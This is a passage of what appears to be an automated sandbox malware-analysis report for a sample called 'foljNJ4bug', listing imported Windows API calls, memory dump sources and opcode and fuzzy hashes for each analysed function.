                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                              • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                              • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                              • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                              APIs
                                                                                                                                              • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                              • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                              • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3087257052-0
                                                                                                                                              • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                              • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                              • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                              • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                              • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                              • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                              • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 245547762-0
                                                                                                                                              • Opcode ID: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                              • Instruction ID: 0a95abeaf907522bb910ccff47ca5b8cdb65f95d12881c86cce1eb50970c9d0a
                                                                                                                                              • Opcode Fuzzy Hash: 4a364c3b246f50765ea579ebeb5236c2c367babb38bf5793ee33ccca847a6907
                                                                                                                                              • Instruction Fuzzy Hash: E921F032200510ABD310EF29DC49F6EB7E8EF44725F008A6FF844E72D1DBB4A8418B99
                                                                                                                                              APIs
                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                              • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                              • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2338827641-0
                                                                                                                                              • Opcode ID: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                              • Instruction ID: fd3aca4fc88a528095528039be3f852d236b7ebb9f74560e76bd8f11b15fbd2f
                                                                                                                                              • Opcode Fuzzy Hash: 2b4904aa023ab9776d85036867689c5727337e5a2013c968bceed19ab76b7b02
                                                                                                                                              • Instruction Fuzzy Hash: 92214F71905204AFEB10DF689D48A9E7FACFB16310F14466BF910D32A1DBB49C85CBAD
                                                                                                                                              APIs
                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CounterPerformanceQuerySleep
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2875609808-0
                                                                                                                                              • Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                              • Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
                                                                                                                                              • Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
                                                                                                                                              • Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
                                                                                                                                              APIs
                                                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00460C17
                                                                                                                                              • GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
                                                                                                                                              • MessageBeep.USER32(00000000), ref: 00460C46
                                                                                                                                              • KillTimer.USER32(?,0000040A), ref: 00460C68
                                                                                                                                              • EndDialog.USER32(?,00000001), ref: 00460C83
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3741023627-0
                                                                                                                                              • Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                              • Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
                                                                                                                                              • Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
                                                                                                                                              • Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4023252218-0
                                                                                                                                              • Opcode ID: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                              • Instruction ID: b4c4dbb9b59ba1bd7f08d964dfa6937d7ad9fb038e30cf105cf785d591c64ca0
                                                                                                                                              • Opcode Fuzzy Hash: 3835efce57e2eefc6c6d584a426a71e2dd3a2f260109f85cc330253665e7d223
                                                                                                                                              • Instruction Fuzzy Hash: D5014870301A01DBDB10EF65E9D8A2B77A8BF48762F10462AFD04D7352D739D849CBA9
                                                                                                                                              APIs
                                                                                                                                              • SendMessageW.USER32(?,00001101,00000000,?), ref: 004555FC
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: DeleteDestroyObject$IconMessageSendWindow
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1489400265-0
                                                                                                                                              • Opcode ID: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                              • Instruction ID: 3262712e9a8127eed33bb9eb3d9864066e7dde5d47db0d590f2b6463dd6d37f9
                                                                                                                                              • Opcode Fuzzy Hash: 7dd20da83386a23a1814408c1199d2c33e99a8c26f67204b6fd348d50f61361a
                                                                                                                                              • Instruction Fuzzy Hash: 07017C74300601DBCB10EF25EEC8A2A73A8BF48712F004569FE019B286D778DC49CB68
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00455728
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1042038666-0
                                                                                                                                              • Opcode ID: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                              • Instruction ID: 2016740d4609c4bbd0e5f1cf6dc7522ca00853e433b5032f7809eda0dc31aff9
                                                                                                                                              • Opcode Fuzzy Hash: 9df849479103f2de49514c9ec76f9cef1897402069f9b01ba3cc14c1fa4130bc
                                                                                                                                              • Instruction Fuzzy Hash: 3701F670200601DBCB10EF69E9D8A2B37ACAF49762B00466AFD01D7256D769DC498B69
                                                                                                                                              APIs
                                                                                                                                              • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                              • __getptd.LIBCMT ref: 00417826
                                                                                                                                              • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                              • __lock.LIBCMT ref: 00417844
                                                                                                                                              • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 938513278-0
                                                                                                                                              • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                              • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                              • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                              • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                              • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                              • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 2403457894-0
                                                                                                                                              • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                              • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                              • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                              • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                              • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                              • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                              • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                              • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                              • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                              • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 4247068974-0
                                                                                                                                              • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                              • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                              • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                              • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID: )$U$\
                                                                                                                                              • API String ID: 0-3705770531
                                                                                                                                              • Opcode ID: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                              • Instruction ID: d0f1885598f34d5f764b4f2a5794ec4e3d7857f6dac93f6e146ba8491093b400
                                                                                                                                              • Opcode Fuzzy Hash: 028001eb2bff774db3903015b7fa80ce6d69291786b8857f67b928b721b55690
                                                                                                                                              • Instruction Fuzzy Hash: 83C1C074A00249CFEB24CF69C5806AEBBF2FF85304F2481ABD8569B351D739994ACF15
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                              • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                              • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000000.00000002.2157892160.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000000.00000002.2157879677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157933374.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157949343.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157965076.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2157980422.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              • Associated: 00000000.00000002.2158014693.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_foljNJ4bug.jbxd
                                                                                                                                              Similarity
